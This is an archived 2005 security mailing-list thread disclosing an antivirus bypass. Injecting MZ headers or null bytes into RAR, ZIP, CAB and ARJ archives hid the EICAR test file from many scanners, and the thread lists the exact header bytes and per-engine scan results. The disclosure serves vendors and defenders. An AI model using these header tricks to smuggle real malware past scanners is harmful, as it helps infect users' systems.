[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <000901c5cd02$71d65df0$0400a8c0@alienwarexpx64>
Date: Sun, 9 Oct 2005 20:51:19 +0200
From: <ad@...ss101.org>
To: "'Thierry Zoller'" <Thierry@...ff-em.com>,
<bugtraq@...urityfocus.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: RE: Re: Antivirus detection bypass by special
craftedarchive.
Works fine, the last symantec 10.0.1.1000 (engine:51.2.0.12) doesn't detect
it :)
-----Message d'origine-----
De : full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] De la part de Thierry
Zoller
Envoyé : dimanche 9 octobre 2005 20:26
À : bugtraq@...urityfocus.com
Cc : full-disclosure@...ts.grok.org.uk
Objet : [Full-disclosure] Re: Antivirus detection bypass by special
craftedarchive.
Dear fRoGGz,
Thank you for your contribution, thank you also for the credits you
gave me and Mr Bieringer for prior research. The details on your
website aswell as your bugtraq posting are clearly uncomprehensible
however. (no offense intended).
I try to clear it up (really quick analyses thus error prone) :
Problem : Unpack Program can unpack file, Anti Virus cannot
Cause : Injection of various "invalid" headers or NULL strings.
AVPoC2.rar - Invalid header (Executable Header Injection)
------------------------------------------------------------
fRoGGz injected an MZ header in the Rar, specificaly he injected
MZP.... 4D 5A 50 00 02 00 00
Resulting in a Header of :
MZP....RAR! 4D 5A 50 00 02 00 00 52 61 72 21
Winrar and Unrar unpack the Archive fine (without any errors)
some AV fail expecting an Executable (might be blocked by clever
AV Gateways as they do content type inspection anyway).
AVPoC1.rar - Actually a ZIP file - Invalid header (Executable Header
Injection)
----------------------------------------------------------------------------
---
fRoGGz injected an MZ header in the Rar (which is actually a ZIP file)
he injected :
MZ 4D 5A
Resulting in a Header of :
MZPK..ÿ - 4D 5A 50 4B 03 04 FF 90
Winzip fails to extract the Zip file, Winrar and Unrar unpack the
Archive fine (without any errors) some AV fail expecting an Executable
(might be blocked by clever AV Gateways as they do content type
inspection anyway).
AVPoC3.cab - Cabinet Archive - Invalid Header (Executable Header Injection)
----------------------------------------------------------------------------
---
fRoGGz injected an MZ header in the Cab, specificaly he injected
MZP.... 4D 5A 50 00 02 00 00
Resulting in a Header of :
MZ....MSCF 4D 5A 00 02 00 00 4D 53 43 46
AVPoC4.arj - ARJ Archive - Invalid Header (Executable Header Injection)
----------------------------------------------------------------------------
---
fRoGGz injected an MZ header in the Cab, specificaly he injected
MZP.... 4D 5A 50 00 02 00 00
Resulting in a Header of :
MZP....` 4D 5A 50 00 02 00 00 60
AVPoC5.arj - ARJ Archive - Invalid Header (00 Injection)
----------------------------------------------------------------------------
---
fRoGGz injected an NULL string int the header of the ARJ file, specificaly
he injected
00
Resulting in a Header of :
00`
uwc>
uwc> Release Date : 2005-10-05
uwc> Tested on: Windows 2000 SP2 & SP4
uwc> Tested with: Jotti Online Antivirus Scanner
uwc> Tested with: VirusTotal Online Antivirus Scanner
uwc> Tested with: Command line freeware UnRAR v3.50
uwc> Tested with: PowerZip v7.06
uwc> Discovered by: fRoGGz
uwc> Credit to: SecuBox Labs
uwc>
uwc>
uwc> -=====================================================================-
uwc> Analysis
uwc> __________
uwc> Specially crafted archive containing a virus will pass
uwc> through the antivirus system without detection.
uwc> An attacker can compress a malicious payload and evade
uwc> detection by some anti-virus software.
uwc> The bypassed malicious content does not pose a risk until
uwc> extracted from the RAR archive file. Malicious content
uwc> will be detected and eliminated by your Antivirus.
uwc> Contrary to Winzip or BitZipper which do not authorize the
uwc> opening of the file, Winrar & PowerZip open & extract it.
uwc>
uwc> -=====================================================================-
uwc>
uwc> Proof of Concept
uwc> ________________
uwc> We have used: eicar.com
uwc> EICAR test is a 68 bytes file "detect" as if it were a virus.
uwc>
uwc> For more information, visit:
uwc> Ref: [ http://shadock.net/secubox/AVCraftedArchive.html ]
uwc>
uwc> Results for: SecuBox_AVPoC1.rar
uwc> _______________________________
uwc> [?] AntiVir Found nothing
uwc> [?] ArcaVir Found nothing
uwc> [?] Avast Found nothing
uwc> [!] AVG Antivirus Found EICAR_Test (+187)
uwc> [!] BitDefender Found EICAR-Test-File (not a virus)
uwc> [!] CAT-QuickHeal Found Eicar.Test
uwc> [~] ClamAV Found nothing >> Suspect
uwc> [?] Dr.Web Found nothing
uwc> [?] eTrust-Iris Found nothing
uwc> [?] eTrust-Vet Found nothing
uwc> [!] Fortinet Found EICAR_TEST_FILE
uwc> [?] F-Prot Antivirus Found nothing
uwc> [!] Ikarus Found EICAR_Test
uwc> [?] Kaspersky Antivirus Found nothing
uwc> [?] McAfee Found nothing
uwc> [?] NOD32 Found nothing
uwc> [?] Norman Virus Control Found nothing
uwc> [!] Panda Found Eicar.Mod
uwc> [?] Sophos Found nothing
uwc> [?] Symantec Found nothing
uwc> [?] TheHacker Found nothing
uwc> [?] UNA Found nothing
uwc> [?] VBA32 Found nothing
uwc>
uwc> Results for: SecuBox_AVPoC2.rar
uwc> ________________________________
uwc> [?] AntiVir Found nothing
uwc> [!] ArcaVir Found Eicar.Test
uwc> [!] Avast Found EICAR Test-NOT!!
uwc> [!] AVG Antivirus Found EICAR_Test
uwc> [?] BitDefender Found nothing
uwc> [!] CAT-QuickHeal Found Eicar.Test
uwc> [~] ClamAV Found nothing >> Suspect
uwc> [?] Dr.Web Found nothing
uwc> [?] eTrust-Iris Found nothing
uwc> [?] eTrust-Vet Found nothing
uwc> [?] Fortinet Found nothing
uwc> [?] F-Prot Antivirus Found nothing
uwc> [?] Fortinet Found nothing
uwc> [!] Ikarus Found EICAR_Test
uwc> [?] Kaspersky Antivirus Found nothing
uwc> [?] McAfee Found nothing
uwc> [?] NOD32 Found nothing
uwc> [?] Norman Virus Control Found nothing
uwc> [!] Panda Found Eicar.Mod
uwc> [!] Sophos EICAR-AV-Test
uwc> [?] Symantec Found nothing
uwc> [?] TheHacker Found nothing
uwc> [?] UNA Found nothing
uwc> [?] VBA32 Found nothing
uwc>
uwc> Results for: SecuBox_AVPoC3.cab
uwc> ________________________________
uwc>
uwc> [?] AntiVir Found nothing
uwc> [?] ArcaVir Found nothing
uwc> [?] Avast Found nothing
uwc> [!] AVG Antivirus Found EICAR_Test
uwc> [?] BitDefender Found nothing
uwc> [?] CAT-QuickHeal Found nothing
uwc> [?] ClamAV Found nothing
uwc> [?] Dr.Web Found nothing
uwc> [?] eTrust-Iris Found nothing
uwc> [?] eTrust-Vet Found nothing
uwc> [?] Fortinet Found nothing
uwc> [?] F-Prot Antivirus Found nothing
uwc> [?] Fortinet Found nothing
uwc> [?] Ikarus Found nothing
uwc> [?] Kaspersky Antivirus Found nothing
uwc> [?] McAfee Found nothing
uwc> [?] NOD32 Found nothing
uwc> [?] Norman Virus Control Found nothing
uwc> [?] Panda Found nothing
uwc> [?] Sophos Found nothing
uwc> [?] Symantec Found nothing
uwc> [?] TheHacker Found nothing
uwc> [?] UNA Found nothing
uwc> [!] VBA32 Found EICAR-Test-File
uwc>
uwc> Unix test with ClamAV
uwc> _____________________
uwc>
uwc> thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab
uwc> SecuBox_AVPoC3.cab: OK
uwc> thot:~$ cabextract SecuBox_AVPoC3.cab
uwc> Extracting cabinet: SecuBox_AVPoC3.cab
uwc> extracting EICAR.com
uwc> All done, no errors.
uwc> thot:~$ clamscan --no-summary EICAR.com
uwc> EICAR.com: Eicar-Test-Signature FOUND
uwc> thot:~$
uwc>
uwc> thot:~$ clamscan -V
uwc> ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005
uwc>
uwc> -==================================================-
uwc>
uwc> CREDiTS
uwc> ---------------------
uwc> SecuBox Labs - fRoGGz
uwc> Greet's fly out to: maew, Jordi Bosveld & VirusTotal
--
Mit freundlichen Grüßen
Thierry Zoller
mailto:Thierry@...ff-em.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists